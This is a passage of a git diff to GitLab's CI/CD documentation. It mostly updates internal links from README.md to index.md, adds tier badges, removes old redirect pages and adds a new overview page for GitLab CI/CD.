want to deploy our app to the production server from a private repository on GitLab. First, we need to [generate a new SSH key pair **with no passphrase**](../../../ssh/index.md) for the deployer user. After that, we need to copy the private key, which will be used to connect to our server as the deployer user with SSH, to be able to automate our deployment process: @@ -119,7 +119,7 @@ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys cat ~/.ssh/id_rsa ``` -Now, let's add it to your GitLab project as a [CI/CD variable](../../variables/README.md). +Now, let's add it to your GitLab project as a [CI/CD variable](../../variables/index.md). Project CI/CD variables are user-defined variables and are stored out of `.gitlab-ci.yml`, for security purposes. They can be added per project by navigating to the project's **Settings** > **CI/CD**. @@ -530,7 +530,7 @@ That's a lot to take in, isn't it? Let's run through it step by step. #### Image and Services -[Runners](../../runners/README.md) run the script defined by `.gitlab-ci.yml`. +[Runners](../../runners/index.md) run the script defined by `.gitlab-ci.yml`. The `image` keyword tells the runners which image to use. The `services` keyword defines additional images [that are linked to the main image](../../services/index.md). Here we use the container image we created before as our main image and also use MySQL 5.7 as a service. @@ -548,7 +548,7 @@ If you wish to test your app with different PHP versions and [database managemen #### CI/CD variables -GitLab CI/CD allows us to use [CI/CD variables](../../yaml/README.md#variables) in our jobs. +GitLab CI/CD allows us to use [CI/CD variables](../../yaml/index.md#variables) in our jobs. We defined MySQL as our database management system, which comes with a superuser root created by default. So we should adjust the configuration of MySQL instance by defining `MYSQL_DATABASE` variable as our database name and `MYSQL_ROOT_PASSWORD` variable as the password of `root`. @@ -567,7 +567,7 @@ variables: #### Unit Test as the first job -We defined the required shell scripts as an array of the [script](../../yaml/README.md#script) keyword to be executed when running `unit_test` job. +We defined the required shell scripts as an array of the [script](../../yaml/index.md#script) keyword to be executed when running `unit_test` job. These scripts are some Artisan commands to prepare the Laravel, and, at the end of the script, we'll run the tests by `PHPUnit`. @@ -593,7 +593,7 @@ To deploy our app with Envoy, we had to set up the `$SSH_PRIVATE_KEY` variable a If the SSH keys have added successfully, we can run Envoy. As mentioned before, GitLab supports [Continuous Delivery](https://about.gitlab.com/blog/2016/08/05/continuous-integration-delivery-and-deployment-with-gitlab/#continuous-delivery) methods as well. -The [environment](../../yaml/README.md#environment) keyword tells GitLab that this job deploys to the `production` environment. +The [environment](../../yaml/index.md#environment) keyword tells GitLab that this job deploys to the `production` environment. The `url` keyword is used to generate a link to our application on the GitLab Environments page. The `only` keyword tells GitLab CI/CD that the job should be executed only when the pipeline is building the `main` branch. Lastly, `when: manual` is used to turn the job from running automatically to a manual action. diff --git a/doc/ci/examples/php.md b/doc/ci/examples/php.md index fc639b19ca0..666c4d444d8 100644 --- a/doc/ci/examples/php.md +++ b/doc/ci/examples/php.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: tutorial --- -# Testing PHP projects +# Testing PHP projects **(FREE)** This guide covers basic building instructions for PHP projects. @@ -25,9 +25,9 @@ things manually. As with every job, you need to create a valid `.gitlab-ci.yml` describing the build environment. -Let's first specify the PHP image that is used for the job process -(you can read more about what an image means in the runner's lingo reading -about [Using Docker images](../docker/using_docker_images.md#what-is-an-image)). +Let's first specify the PHP image that is used for the job process. +(You can read more about what an image means in the runner's lingo reading +about [Using Docker images](../docker/using_docker_images.md#what-is-an-image).) Start by adding the image to your `.gitlab-ci.yml`: @@ -270,7 +270,7 @@ gitlab-runner exec shell test:app We have set up an [Example PHP Project](https://gitlab.com/gitlab-examples/php) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available -[shared runners](../runners/README.md). +[shared runners](../runners/index.md). Want to hack on it? Simply fork it, commit, and push your changes. Within a few moments the changes are picked by a public runner and the job begins. diff --git a/doc/ci/examples/semantic-release.md b/doc/ci/examples/semantic-release.md index 28a0080626a..e7b9b9b51ad 100644 --- a/doc/ci/examples/semantic-release.md +++ b/doc/ci/examples/semantic-release.md @@ -4,7 +4,7 @@ group: Package info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Publish npm packages to the GitLab Package Registry using semantic-release +# Publish npm packages to the GitLab Package Registry using semantic-release **(FREE)** This guide demonstrates how to automatically publish npm packages to the [GitLab Package Registry](../../user/packages/npm_registry/index.md) by using [semantic-release](https://github.com/semantic-release/semantic-release). diff --git a/doc/ci/examples/test-and-deploy-python-application-to-heroku.md b/doc/ci/examples/test-and-deploy-python-application-to-heroku.md deleted file mode 100644 index 94cfb8c1c58..00000000000 --- a/doc/ci/examples/test-and-deploy-python-application-to-heroku.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'README.md#contributed-examples' -remove_date: '2021-06-01' ---- - -This document was moved to [another location](README.md#contributed-examples). - -<!-- This redirect file can be deleted after 2021-06-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/examples/test-and-deploy-ruby-application-to-heroku.md b/doc/ci/examples/test-and-deploy-ruby-application-to-heroku.md deleted file mode 100644 index 94cfb8c1c58..00000000000 --- a/doc/ci/examples/test-and-deploy-ruby-application-to-heroku.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'README.md#contributed-examples' -remove_date: '2021-06-01' ---- - -This document was moved to [another location](README.md#contributed-examples). - -<!-- This redirect file can be deleted after 2021-06-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/examples/test-clojure-application.md b/doc/ci/examples/test-clojure-application.md deleted file mode 100644 index cb4040212ad..00000000000 --- a/doc/ci/examples/test-clojure-application.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'README.md#contributed-examples' -remove_date: '2021-05-26' ---- - -This document was moved to [another location](README.md#contributed-examples). - -<!-- This redirect file can be deleted after 2021-05-26. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/git_submodules.md b/doc/ci/git_submodules.md index f0ea5ed582c..0df653acca4 100644 --- a/doc/ci/git_submodules.md +++ b/doc/ci/git_submodules.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference --- -# Using Git submodules with GitLab CI/CD +# Using Git submodules with GitLab CI/CD **(FREE)** Use [Git submodules](https://git-scm.com/book/en/v2/Git-Tools-Submodules) to keep a Git repository as a subdirectory of another Git repository. You can clone another diff --git a/doc/ci/index.md b/doc/ci/index.md new file mode 100644 index 00000000000..593f50d4ffd --- /dev/null +++ b/doc/ci/index.md @@ -0,0 +1,186 @@ +--- +stage: Verify +group: Pipeline Execution +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +comments: false +description: "Learn how to use GitLab CI/CD, the GitLab built-in Continuous Integration, Continuous Deployment, and Continuous Delivery toolset to build, test, and deploy your application." +type: index +--- + +# GitLab CI/CD **(FREE)** + +GitLab CI/CD is a tool built into GitLab for software development +through the [continuous methodologies](introduction/index.md): + +- Continuous Integration (CI) +- Continuous Delivery (CD) +- Continuous Deployment (CD) + +NOTE: +Out-of-the-box management systems can decrease hours spent on maintaining toolchains by 10% or more. +Watch our ["Mastering continuous software development"](https://about.gitlab.com/webcast/mastering-ci-cd/) +webcast to learn about continuous methods and how the GitLab built-in CI can help you simplify and scale software development. + +Continuous Integration works by pushing small code chunks to your +application's codebase hosted in a Git repository, and to every +push, run a pipeline of scripts to build, test, and validate the +code changes before merging them into the main branch. + +Continuous Delivery and Deployment consist of a step further CI, +deploying your application to production at every +push to the default branch of the repository. + +These methodologies allow you to catch bugs and errors early in +the development cycle, ensuring that all the code deployed to +production complies with the code standards you established for +your app. + +GitLab can also automatically detect, build, test, deploy, and +monitor your applications by using [Auto DevOps](../topics/autodevops/index.md). + +For a complete overview of these methodologies and GitLab CI/CD, +read the [Introduction to CI/CD with GitLab](introduction/index.md). + +<div class="video-fallback"> + Video demonstration of GitLab CI/CD: <a href="https://www.youtube.com/watch?v=1iXFbchozdY">Demo: CI/CD with GitLab</a>. +</div> +<figure class="video-container"> + <iframe src="https://www.youtube.com/embed/1iXFbchozdY" frameborder="0" allowfullscreen="true"> </iframe> +</figure> + +## Concepts + +GitLab CI/CD uses a number of concepts to describe and run your build and deploy. + +| Concept | Description | +|:--------------------------------------------------------|:-------------------------------------------------------------------------------| +| [Pipelines](pipelines/index.md) | Structure your CI/CD process through pipelines. | +| [CI/CD variables](variables/index.md) | Reuse values based on a variable/value key pair. | +| [Environments](environments/index.md) | Deploy your application to different environments (e.g., staging, production). | +| [Job artifacts](pipelines/job_artifacts.md) | Output, use, and reuse job artifacts. | +| [Cache dependencies](caching/index.md) | Cache your dependencies for a faster execution. | +| [GitLab Runner](https://docs.gitlab.com/runner/) | Configure your own runners to execute your scripts. | +| [Pipeline efficiency](pipelines/pipeline_efficiency.md) | Configure your pipelines to run quickly and efficiently. | +| [Test cases](test_cases/index.md) | Configure your pipelines to run quickly and efficiently. <!--- this seems to be a duplicate description ---> | + +## Configuration + +GitLab CI/CD supports numerous configuration options: + +| Configuration | Description | +|:----------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------| +| [Schedule pipelines](pipelines/schedules.md) | Schedule pipelines to run as often as you need. | +| [Custom path for `.gitlab-ci.yml`](pipelines/settings.md#specify-a-custom-cicd-configuration-file) | Define a custom path for the CI/CD configuration file. | +| [Git submodules for CI/CD](git_submodules.md) | Configure jobs for using Git submodules. | +| [SSH keys for CI/CD](ssh_keys/index.md) | Using SSH keys in your CI pipelines. | +| [Pipeline triggers](triggers/index.md) | Trigger pipelines through the API. | +| [Pipelines for Merge Requests](pipelines/merge_request_pipelines.md) | Design a pipeline structure for running a pipeline in merge requests. | +| [Integrate with Kubernetes clusters](../user/project/clusters/index.md) | Connect your project to Google Kubernetes Engine (GKE) or an existing Kubernetes cluster. | +| [Optimize GitLab and GitLab Runner for large repositories](large_repositories/index.md) | Recommended strategies for handling large repositories. | +| [`.gitlab-ci.yml` full reference](yaml/index.md) | All the attributes you can use with GitLab CI/CD. | + +Note that certain operations can only be performed according to the +[user](../user/permissions.md#gitlab-cicd-permissions) and [job](../user/permissions.md#job-permissions) permissions. + +## Feature set + +Use the vast GitLab CI/CD to easily configure it for specific purposes. +Its feature set is listed on the table below according to DevOps stages. + +| Feature | Description | +|:------------------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------------------------------------------------| +| **Configure** | | +| [Auto DevOps](../topics/autodevops/index.md) | Set up your app's entire lifecycle. | +| [ChatOps](chatops/index.md) | Trigger CI jobs from chat, with results sent back to the channel. | +|-------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------| +| **Verify** | | +| [Browser Performance Testing](../user/project/merge_requests/browser_performance_testing.md) | Quickly determine the browser performance impact of pending code changes. | +| [Load Performance Testing](../user/project/merge_requests/load_performance_testing.md) | Quickly determine the server performance impact of pending code changes. | +| [CI services](services/index.md) | Link Docker containers with your base image. | +| [Code Quality](../user/project/merge_requests/code_quality.md) | Analyze your source code quality. | +| [GitLab CI/CD for external repositories](ci_cd_for_external_repos/index.md) **(PREMIUM)** | Get the benefits of GitLab CI/CD combined with repositories in GitHub and Bitbucket Cloud. | +| [Interactive Web Terminals](interactive_web_terminal/index.md) **(FREE SELF)** | Open an interactive web terminal to debug the running jobs. | +| [Unit test reports](unit_test_reports.md) | Identify script failures directly on merge requests. | +| [Using Docker images](docker/using_docker_images.md) | Use GitLab and GitLab Runner with Docker to build and test applications. | +|-------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------| +| **Release** | | +| [Auto Deploy](../topics/autodevops/stages.md#auto-deploy) | Deploy your application to a production environment in a Kubernetes cluster. | +| [Building Docker images](docker/using_docker_build.md) | Maintain Docker-based projects using GitLab CI/CD. | +| [Canary Deployments](../user/project/canary_deployments.md) | Ship features to only a portion of your pods and let a percentage of your user base to visit the temporarily deployed feature. | +| [Deploy Boards](../user/project/deploy_boards.md) | Check the current health and status of each CI/CD environment running on Kubernetes. | +| [Feature Flags](../operations/feature_flags.md) **(PREMIUM)** | Deploy your features behind Feature Flags. | +| [GitLab Pages](../user/project/pages/index.md) | Deploy static websites. | +| [GitLab Releases](../user/project/releases/index.md) | Add release notes to Git tags. | +| [Review Apps](review_apps/index.md) | Configure GitLab CI/CD to preview code changes. | +| [Cloud deployment](cloud_deployment/index.md) | Deploy your application to a main cloud provider. | +|-------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------| +| **Secure** | | +| [Container Scanning](../user/application_security/container_scanning/index.md) **(ULTIMATE)** | Check your Docker containers for known vulnerabilities. | +| [Dependency Scanning](../user/application_security/dependency_scanning/index.md) **(ULTIMATE)** | Analyze your dependencies for known vulnerabilities. | +| [License Compliance](../user/compliance/license_compliance/index.md) **(ULTIMATE)** | Search your project dependencies for their licenses. | +| [Security Test reports](../user/application_security/index.md) **(ULTIMATE)** | Check for app vulnerabilities. | + +## Examples + +Find example project code and tutorials for using GitLab CI/CD with a variety of app frameworks, languages, and platforms +on the [CI Examples](examples/README.md) page. + +## Administration **(FREE SELF)** + +As a GitLab administrator, you can change the default behavior +of GitLab CI/CD for: + +- An [entire GitLab instance](../user/admin_area/settings/continuous_integration.md). +- Specific projects, using [pipelines settings](pipelines/settings.md). + +See also: + +- [How to enable or disable GitLab CI/CD](enable_or_disable_ci.md). +- Other [CI administration settings](../administration/index.md#continuous-integration-settings). + +## References + +### Why GitLab CI/CD? + +Learn more about: + +- [Why you might choose GitLab CI/CD](https://about.gitlab.com/blog/2016/10/17/gitlab-ci-oohlala/). +- [Reasons you might migrate from another platform](https://about.gitlab.com/blog/2016/07/22/building-our-web-app-on-gitlab-ci/). +- [5 Teams that made the switch to GitLab CI/CD](https://about.gitlab.com/blog/2019/04/25/5-teams-that-made-the-switch-to-gitlab-ci-cd/) + +See also the [Why CI/CD?](https://docs.google.com/presentation/d/1OGgk2Tcxbpl7DJaIOzCX4Vqg3dlwfELC3u2jEeCBbDk) presentation. + +### Breaking changes + +As GitLab CI/CD has evolved, certain breaking changes have +been necessary. These are: + +#### 13.0 + +- [Remove Backported `os.Expand`](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4915). +- [Remove Fedora 29 package support](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/16158). +- [Remove macOS 32-bit support](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/25466). +- [Removed `debug/jobs/list?v=1` endpoint](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6361). +- [Remove support for array of strings when defining services for Docker executor](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4922). +- [Remove `--docker-services` flag on register command](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6404). +- [Remove legacy build directory caching](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4180). +- [Remove `FF_USE_LEGACY_VOLUMES_MOUNTING_ORDER` feature flag](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6581). +- [Remove support for Windows Server 1803](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6553). + +#### 12.0 + +- [Use `refspec` to clone/fetch Git repository](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4069). +- [Old cache configuration](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4070). +- [Old metrics server configuration](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4072). +- [Remove `FF_K8S_USE_ENTRYPOINT_OVER_COMMAND`](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4073). +- [Remove Linux distributions that reach EOL](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/1130). +- [Update command line API for helper images](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4013). +- [Remove old `git clean` flow](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4175). + +#### 11.0 + +- No breaking changes. + +#### 10.0 + +- No breaking changes. diff --git a/doc/ci/interactive_web_terminal/index.md b/doc/ci/interactive_web_terminal/index.md index cbf92438488..46abcf4a21d 100644 --- a/doc/ci/interactive_web_terminal/index.md +++ b/doc/ci/interactive_web_terminal/index.md @@ -16,7 +16,7 @@ is deployed, some [security precautions](../../administration/integration/termin taken to protect the users. NOTE: -[Shared runners on GitLab.com](../runners/README.md) do not +[Shared runners on GitLab.com](../runners/index.md) do not provide an interactive web terminal. Follow [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/24674) for progress on adding support. For groups and projects hosted on GitLab.com, interactive web diff --git a/doc/ci/introduction/index.md b/doc/ci/introduction/index.md index 780c5cd7762..add47c95051 100644 --- a/doc/ci/introduction/index.md +++ b/doc/ci/introduction/index.md @@ -26,7 +26,7 @@ Watch our ["Mastering continuous software development"](https://about.gitlab.com webcast to learn about continuous methods and how built-in GitLab CI/CD can help you simplify and scale software development. > - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Learn how to [configure CI/CD](https://www.youtube.com/embed/opdLqwz6tcE). -> - [Make the case for CI/CD in your organization](https://about.gitlab.com/compare/github-actions-alternative/). +> - [Make the case for CI/CD in your organization](https://about.gitlab.com/devops-tools/github-vs-gitlab/). > - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Learn how [Verizon reduced rebuilds](https://about.gitlab.com/blog/2019/02/14/verizon-customer-story/) > from 30 days to under 8 hours with GitLab. diff --git a/doc/ci/jobs/index.md b/doc/ci/jobs/index.md index 7a57d8abf0d..3fe30c78d6a 100644 --- a/doc/ci/jobs/index.md +++ b/doc/ci/jobs/index.md @@ -4,14 +4,14 @@ group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Jobs +# Jobs **(FREE)** Pipeline configuration begins with jobs. Jobs are the most fundamental element of a `.gitlab-ci.yml` file. Jobs are: - Defined with constraints stating under what conditions they should be executed. -- Top-level elements with an arbitrary name and must contain at least the [`script`](../yaml/README.md#script) clause. +- Top-level elements with an arbitrary name and must contain at least the [`script`](../yaml/index.md#script) clause. - Not limited in how many can be defined. For example: @@ -29,7 +29,7 @@ jobs, where each of the jobs executes a different command. Of course a command can execute code directly (`./configure;make;make install`) or run a script (`test.sh`) in the repository. -Jobs are picked up by [runners](../runners/README.md) and executed in the +Jobs are picked up by [runners](../runners/index.md) and executed in the environment of the runner. What is important is that each job is run independently from each other. @@ -101,7 +101,7 @@ jobs. Click to expand them.  -To create a group of jobs, in the [CI/CD pipeline configuration file](../yaml/README.md), +To create a group of jobs, in the [CI/CD pipeline configuration file](../yaml/index.md), separate each job name with a number and one of the following: - A slash (`/`), for example, `test 1/3`, `test 2/3`, `test 3/3`. @@ -157,9 +157,9 @@ additional variables. To access this page, click on the **name** of the manual j the pipeline view, *not* the play (**{play}**) button. This is useful when you want to alter the execution of a job that uses -[custom CI/CD variables](../variables/README.md#custom-cicd-variables). +[custom CI/CD variables](../variables/index.md#custom-cicd-variables). Add a variable name (key) and value here to override the value defined in -[the UI or `.gitlab-ci.yml`](../variables/README.md#custom-cicd-variables), +[the UI or `.gitlab-ci.yml`](../variables/index.md#custom-cicd-variables), for a single run of the manual job.  @@ -168,7 +168,7 @@ for a single run of the manual job. > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/21767) in GitLab 11.4. -When you do not want to run a job immediately, you can use the [`when:delayed`](../yaml/README.md#whendelayed) keyword to +When you do not want to run a job immediately, you can use the [`when:delayed`](../yaml/index.md#whendelayed) keyword to delay a job's execution for a certain period. This is especially useful for timed incremental rollout where new code is rolled out gradually. diff --git a/doc/ci/jobs/job_control.md b/doc/ci/jobs/job_control.md index d7e192bbfda..634214aedc3 100644 --- a/doc/ci/jobs/job_control.md +++ b/doc/ci/jobs/job_control.md @@ -12,22 +12,22 @@ the status of variables, the pipeline type, and so on. To configure a job to be included or excluded from certain pipelines, you can use: -- [`rules`](../yaml/README.md#rules) -- [`only`](../yaml/README.md#only--except) -- [`except`](../yaml/README.md#only--except) +- [`rules`](../yaml/index.md#rules) +- [`only`](../yaml/index.md#only--except) +- [`except`](../yaml/index.md#only--except) -Use [`needs`](../yaml/README.md#needs) to configure a job to run as soon as the +Use [`needs`](../yaml/index.md#needs) to configure a job to run as soon as the earlier jobs it depends on finish running. ## Specify when jobs run with `rules` > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27863) in GitLab 12.3. -Use [`rules`](../yaml/README.md#rules) to include or exclude jobs in pipelines. +Use [`rules`](../yaml/index.md#rules) to include or exclude jobs in pipelines. Rules are evaluated in order until the first match. When a match is found, the job is either included or excluded from the pipeline, depending on the configuration. -See the [`rules`](../yaml/README.md#rules) reference for more details. +See the [`rules`](../yaml/index.md#rules) reference for more details. Future keyword improvements are being discussed in our [epic for improving `rules`](https://gitlab.com/groups/gitlab-org/-/epics/2783), where anyone can add suggestions or requests. @@ -47,7 +47,7 @@ job: ``` - If the pipeline is for a merge request, the first rule matches, and the job - is added to the [merge request pipeline](../merge_request_pipelines/index.md) + is added to the [merge request pipeline](../pipelines/merge_request_pipelines.md) with attributes of: - `when: manual` (manual job) - `allow_failure: true` (the pipeline continues running even if the manual job is not run) @@ -150,7 +150,7 @@ causes duplicated pipelines. To avoid duplicate pipelines, you can: -- Use [`workflow`](../yaml/README.md#workflow) to specify which types of pipelines +- Use [`workflow`](../yaml/index.md#workflow) to specify which types of pipelines can run. - Rewrite the rules to run the job only in very specific cases, and avoid a final `when:` rule: @@ -179,7 +179,7 @@ job: ``` You should not include both push and merge request pipelines in the same job without -[`workflow:rules` that prevent duplicate pipelines](../yaml/README.md#switch-between-branch-pipelines-and-merge-request-pipelines): +[`workflow:rules` that prevent duplicate pipelines](../yaml/index.md#switch-between-branch-pipelines-and-merge-request-pipelines): ```yaml job: @@ -206,12 +206,12 @@ job-with-rules: For every change pushed to the branch, duplicate pipelines run. One branch pipeline runs a single job (`job-with-no-rules`), and one merge request pipeline runs the other job (`job-with-rules`). Jobs with no rules default -to [`except: merge_requests`](../yaml/README.md#only--except), so `job-with-no-rules` +to [`except: merge_requests`](../yaml/index.md#only--except), so `job-with-no-rules` runs in all cases except merge requests. ### Common `if` clauses for `rules` -For behavior similar to the [`only`/`except` keywords](../yaml/README.md#only--except), you can +For behavior similar to the [`only`/`except` keywords](../yaml/index.md#only--except), you can check the value of the `$CI_PIPELINE_SOURCE` variable: | Value | Description | @@ -220,12 +220,12 @@ check the value of the `$CI_PIPELINE_SOURCE` variable: | `chat` | For pipelines created by using a [GitLab ChatOps](../chatops/index.md) command. | | `external` | When you use CI services other than GitLab. | | `external_pull_request_event` | When an external pull request on GitHub is created or updated. See [Pipelines for external pull requests](../ci_cd_for_external_repos/index.md#pipelines-for-external-pull-requests). | -| `merge_request_event` | For pipelines created when a merge request is created or updated. Required to enable [merge request pipelines](../merge_request_pipelines/index.md), [merged results pipelines](../merge_request_pipelines/pipelines_for_merged_results/index.md), and [merge trains](../merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). | -| `parent_pipeline` | For pipelines triggered by a [parent/child pipeline](../parent_child_pipelines.md) with `rules`. Use this pipeline source in the child pipeline configuration so that it can be triggered by the parent pipeline. | -| `pipeline` | For [multi-project pipelines](../multi_project_pipelines.md) created by [using the API with `CI_JOB_TOKEN`](../multi_project_pipelines.md#triggering-multi-project-pipelines-through-api), or the [`trigger`](../yaml/README.md#trigger) keyword. | +| `merge_request_event` | For pipelines created when a merge request is created or updated. Required to enable [merge request pipelines](../pipelines/merge_request_pipelines.md), [merged results pipelines](../pipelines/pipelines_for_merged_results.md), and [merge trains](../pipelines/merge_trains.md). | +| `parent_pipeline` | For pipelines triggered by a [parent/child pipeline](../pipelines/parent_child_pipelines.md) with `rules`. Use this pipeline source in the child pipeline configuration so that it can be triggered by the parent pipeline. | +| `pipeline` | For [multi-project pipelines](../pipelines/multi_project_pipelines.md) created by [using the API with `CI_JOB_TOKEN`](../pipelines/multi_project_pipelines.md#create-multi-project-pipelines-by-using-the-api), or the [`trigger`](../yaml/index.md#trigger) keyword. | | `push` | For pipelines triggered by a `git push` event, including for branches and tags. | | `schedule` | For [scheduled pipelines](../pipelines/schedules.md). | -| `trigger` | For pipelines created by using a [trigger token](../triggers/README.md#trigger-token). | +| `trigger` | For pipelines created by using a [trigger token](../triggers/index.md#trigger-token). | | `web` | For pipelines created by using **Run pipeline** button in the GitLab UI, from the project's **CI/CD > Pipelines** section. | | `webide` | For pipelines created by using the [WebIDE](../../user/project/web_ide/index.md). | @@ -243,7 +243,7 @@ job: - if: '$CI_PIPELINE_SOURCE == "push"' ``` -The following example runs the job as a `when: on_success` job in [merge request pipelines](../merge_request_pipelines/index.md) +The following example runs the job as a `when: on_success` job in [merge request pipelines](../pipelines/merge_request_pipelines.md) and scheduled pipelines. It does not run in any other pipeline type. ```yaml @@ -263,7 +263,7 @@ Other commonly used variables for `if` clauses: branch. Use when you want to have the same configuration in multiple projects with different default branches. - `if: '$CI_COMMIT_BRANCH =~ /regex-expression/'`: If the commit branch matches a regular expression. -- `if: '$CUSTOM_VARIABLE !~ /regex-expression/'`: If the [custom variable](../variables/README.md#custom-cicd-variables) +- `if: '$CUSTOM_VARIABLE !~ /regex-expression/'`: If the [custom variable](../variables/index.md#custom-cicd-variables) `CUSTOM_VARIABLE` does **not** match a regular expression. - `if: '$CUSTOM_VARIABLE == "value1"'`: If the custom variable `CUSTOM_VARIABLE` is exactly `value1`. @@ -292,7 +292,7 @@ You can use the `$` character for both variables and paths. For example, if the ## Specify when jobs run with `only` and `except` -You can use [`only`](../yaml/README.md#only--except) and [`except`](../yaml/README.md#only--except) +You can use [`only`](../yaml/index.md#only--except) and [`except`](../yaml/index.md#only--except) to control when to add jobs to pipelines. - Use `only` to define when a job runs. @@ -301,12 +301,12 @@ to control when to add jobs to pipelines. ### `only:refs` / `except:refs` examples `only` or `except` used without `refs` is the same as -[`only:refs` / `except/refs`](../yaml/README.md#onlyrefs--exceptrefs) +[`only:refs` / `except/refs`](../yaml/index.md#onlyrefs--exceptrefs) In the following example, `job` runs only for: - Git tags -- [Triggers](../triggers/README.md#trigger-token) +- [Triggers](../triggers/index.md#trigger-token) - [Scheduled pipelines](../pipelines/schedules.md) ```yaml @@ -334,7 +334,7 @@ except `main` and branches that start with `release/`. ### `only: variables` / `except: variables` examples -You can use [`except:variables`](../yaml/README.md#onlyvariables--exceptvariables) to exclude jobs based on a commit message: +You can use [`except:variables`](../yaml/index.md#onlyvariables--exceptvariables) to exclude jobs based on a commit message: ```yaml end-to-end: @@ -382,7 +382,7 @@ Read more about how to use `only:changes` and `except:changes`: #### Use `only:changes` with pipelines for merge requests -With [pipelines for merge requests](../merge_request_pipelines/index.md), +With [pipelines for merge requests](../pipelines/merge_request_pipelines.md), it's possible to define a job to be created based on files modified in a merge request. @@ -432,7 +432,7 @@ properly corrects any failures from previous pipelines. #### Use `only:changes` without pipelines for merge requests -Without [pipelines for merge requests](../merge_request_pipelines/index.md), pipelines +Without [pipelines for merge requests](../pipelines/merge_request_pipelines.md), pipelines run on branches or tags that don't have an explicit association with a merge request. In this case, a previous SHA is used to calculate the diff, which is equivalent to `git diff HEAD~`. This can result in some unexpected behavior, including: @@ -502,16 +502,16 @@ test: You can use [predefined CI/CD variables](../variables/predefined_variables.md) to choose which pipeline types jobs run in, with: -- [`rules`](../yaml/README.md#rules) -- [`only:variables`](../yaml/README.md#onlyvariables--exceptvariables) -- [`except:variables`](../yaml/README.md#onlyvariables--exceptvariables) +- [`rules`](../yaml/index.md#rules) +- [`only:variables`](../yaml/index.md#onlyvariables--exceptvariables) +- [`except:variables`](../yaml/index.md#onlyvariables--exceptvariables) The following table lists some of the variables that you can use, and the pipeline types the variables can control for: - Branch pipelines that run for Git `push` events to a branch, like new commits or tags. - Tag pipelines that run only when a new Git tag is pushed to a branch. -- [Merge request pipelines](../merge_request_pipelines/index.md) that run for changes +- [Merge request pipelines](../pipelines/merge_request_pipelines.md) that run for changes to a merge request, like new commits or selecting the **Run pipeline** button in a merge request's pipelines tab. - [Scheduled pipelines](../pipelines/schedules.md). @@ -592,14 +592,14 @@ Feature.enable(:allow_unsafe_ruby_regexp) ## CI/CD variable expressions -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/37397) in GitLab 10.7 for [the `only` and `except` CI keywords](../yaml/README.md#onlyvariables--exceptvariables) -> - [Expanded](https://gitlab.com/gitlab-org/gitlab/-/issues/27863) in GitLab 12.3 with [the `rules` keyword](../yaml/README.md#rules) +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/37397) in GitLab 10.7 for [the `only` and `except` CI keywords](../yaml/index.md#onlyvariables--exceptvariables) +> - [Expanded](https://gitlab.com/gitlab-org/gitlab/-/issues/27863) in GitLab 12.3 with [the `rules` keyword](../yaml/index.md#rules) Use variable expressions to control which jobs are created in a pipeline after changes are pushed to GitLab. You can use variable expressions with: -- [`rules:if`](../yaml/README.md#rules). -- [`only:variables` and `except:variables`](../yaml/README.md#onlyvariables--exceptvariables). +- [`rules:if`](../yaml/index.md#rules). +- [`only:variables` and `except:variables`](../yaml/index.md#onlyvariables--exceptvariables). For example, with `rules:if`: diff --git a/doc/ci/large_repositories/index.md b/doc/ci/large_repositories/index.md index 62e9749d959..c3b0cd79d2c 100644 --- a/doc/ci/large_repositories/index.md +++ b/doc/ci/large_repositories/index.md @@ -28,7 +28,7 @@ Each guideline is described in more detail in the sections below: > Introduced in GitLab Runner 8.9. -GitLab and GitLab Runner perform a [shallow clone](../pipelines/settings.md#git-shallow-clone) +GitLab and GitLab Runner perform a [shallow clone](../pipelines/settings.md#limit-the-number-of-changes-fetched-during-clone) by default. Ideally, you should always use `GIT_DEPTH` with a small number diff --git 